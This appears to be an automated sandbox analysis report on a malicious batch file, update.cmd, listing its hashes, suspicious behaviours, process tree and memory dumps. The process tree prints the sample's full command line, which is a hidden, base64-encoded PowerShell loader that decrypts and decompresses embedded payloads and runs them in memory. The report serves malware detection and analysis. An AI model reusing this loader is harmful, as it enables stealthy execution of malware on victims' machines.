43feb4c81e9e5be7b22c542dd0d54725075a67dbf592bb65b3b625c04256af55

General

Target

update.cmd
Size

60KB
MD5

55db0ea580cce204785f5537cbabf05b
SHA1

d2f423c3416532ef91b74b50c5cb746829f3d114
SHA256

43feb4c81e9e5be7b22c542dd0d54725075a67dbf592bb65b3b625c04256af55
SHA512

c12463cc06def3a872f904e44378145a39c72659961ed48156b083440041d4662a454c5737fd0fa45199e659ba62a90029c3800a94526895b43ac3ac0d430480
SSDEEP

1536:9TpJ48aohXl/LnI5BDLfj+OMfh3BRc8z4lJm5DQ3Vve:Jr4In7I5BDLfKf8+DYg

Score

1^/10

Malware Config

Signatures

Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

powershell.exe

pid process

2524 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 2524 powershell.exe

pid	process
2524	powershell.exe

description	pid	process
Token: SeDebugPrivilege	2524	powershell.exe

Suspicious use of WriteProcessMemory 15 IoCs

Processes:

cmd.execmd.exe

description	pid	process	target process
PID 2196 wrote to memory of 2056	2196	cmd.exe	cmd.exe
PID 2196 wrote to memory of 2056	2196	cmd.exe	cmd.exe
PID 2196 wrote to memory of 2056	2196	cmd.exe	cmd.exe
PID 2196 wrote to memory of 2276	2196	cmd.exe	cmd.exe
PID 2196 wrote to memory of 2276	2196	cmd.exe	cmd.exe
PID 2196 wrote to memory of 2276	2196	cmd.exe	cmd.exe
PID 2276 wrote to memory of 2292	2276	cmd.exe	cmd.exe
PID 2276 wrote to memory of 2292	2276	cmd.exe	cmd.exe
PID 2276 wrote to memory of 2292	2276	cmd.exe	cmd.exe
PID 2276 wrote to memory of 2560	2276	cmd.exe	cmd.exe
PID 2276 wrote to memory of 2560	2276	cmd.exe	cmd.exe
PID 2276 wrote to memory of 2560	2276	cmd.exe	cmd.exe
PID 2276 wrote to memory of 2524	2276	cmd.exe	powershell.exe
PID 2276 wrote to memory of 2524	2276	cmd.exe	powershell.exe
PID 2276 wrote to memory of 2524	2276	cmd.exe	powershell.exe

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\update.cmd"
1⤵
- Suspicious use of WriteProcessMemory
PID:2196

C:\Windows\system32\cmd.exe
cmd /c "set __=^&rem"
2⤵
PID:2056

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\update.cmd
2⤵
- Suspicious use of WriteProcessMemory
PID:2276

C:\Windows\system32\cmd.exe
cmd /c "set __=^&rem"
3⤵
PID:2292

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\update.cmd';iex ([Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('cG93ZXJzaGVsbCAtdyBoaWRkZW47ZnVuY3Rpb24gTmpxc2koJGFGRGxFKXskRlVRT209W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7JEZVUU9tLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzskRlVRT20uUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OyRGVVFPbS5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnQUhUZE9FL3hjdmdJSHFUajZEOGhsZStsMTdONklWWTVzOVlhSjE4WmpPWT0nKTskRlVRT20uSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnZ0Q5RS9pL2x6Wk1NMXgrQWtTUVdTQT09Jyk7JGZUdURqPSRGVVFPbS5DcmVhdGVEZWNyeXB0b3IoKTskY2NVVko9JGZUdURqLlRyYW5zZm9ybUZpbmFsQmxvY2soJGFGRGxFLDAsJGFGRGxFLkxlbmd0aCk7JGZUdURqLkRpc3Bvc2UoKTskRlVRT20uRGlzcG9zZSgpOyRjY1VWSjt9ZnVuY3Rpb24ga1FoZWsoJGFGRGxFKXska2ZtWmc9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTWVtb3J5U3RyZWFtKCwkYUZEbEUpOyRpV212WD1OZXctT2JqZWN0IFN5c3RlbS5JTy5NZW1vcnlTdHJlYW07JHdSd2RrPU5ldy1PYmplY3QgU3lzdGVtLklPLkNvbXByZXNzaW9uLkdaaXBTdHJlYW0oJGtmbVpnLFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTskd1J3ZGsuQ29weVRvKCRpV212WCk7JHdSd2RrLkRpc3Bvc2UoKTska2ZtWmcuRGlzcG9zZSgpOyRpV212WC5EaXNwb3NlKCk7JGlXbXZYLlRvQXJyYXkoKTt9JG1KZ3ViPVtTeXN0ZW0uSU8uRmlsZV06OlJlYWRMaW5lcyhbQ29uc29sZV06OlRpdGxlKTskdFBTeEY9a1FoZWsgKE5qcXNpIChbQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoW1N5c3RlbS5MaW5xLkVudW1lcmFibGVdOjpFbGVtZW50QXQoJG1KZ3ViLCA1KS5TdWJzdHJpbmcoMikpKSk7JHlTZ2taPWtRaGVrIChOanFzaSAoW0NvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKFtTeXN0ZW0uTGlucS5FbnVtZXJhYmxlXTo6RWxlbWVudEF0KCRtSmd1YiwgNikuU3Vic3RyaW5nKDIpKSkpO1tTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoW2J5dGVbXV0keVNna1opLkVudHJ5UG9pbnQuSW52b2tlKCRudWxsLCRudWxsKTtbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKFtieXRlW11dJHRQU3hGKS5FbnRyeVBvaW50Lkludm9rZSgkbnVsbCwkbnVsbCk7'))) "
3⤵
PID:2560

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2524

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

memory/2524-4-0x000000001B450000-0x000000001B732000-memory.dmp

Filesize
2.9MB

Download
memory/2524-5-0x0000000001EC0000-0x0000000001EC8000-memory.dmp

Filesize
32KB

Download
memory/2524-6-0x000007FEF5E00000-0x000007FEF679D000-memory.dmp

Filesize
9.6MB

Download
memory/2524-7-0x0000000002990000-0x0000000002A10000-memory.dmp

Filesize
512KB

Download
memory/2524-8-0x000007FEF5E00000-0x000007FEF679D000-memory.dmp

Filesize
9.6MB

Download
memory/2524-9-0x0000000002990000-0x0000000002A10000-memory.dmp

Filesize
512KB

Download
memory/2524-10-0x0000000002990000-0x0000000002A10000-memory.dmp

Filesize
512KB

Download
memory/2524-11-0x0000000002990000-0x0000000002A10000-memory.dmp

Filesize
512KB

Download
memory/2524-12-0x000007FEF5E00000-0x000007FEF679D000-memory.dmp

Filesize
9.6MB

Download
memory/2524-13-0x0000000002990000-0x0000000002A10000-memory.dmp

Filesize
512KB

Download
memory/2524-14-0x0000000002990000-0x0000000002A10000-memory.dmp

Filesize
512KB

Download
memory/2524-15-0x0000000002990000-0x0000000002A10000-memory.dmp

Filesize
512KB

Download
memory/2524-16-0x0000000002990000-0x0000000002A10000-memory.dmp

Filesize
512KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads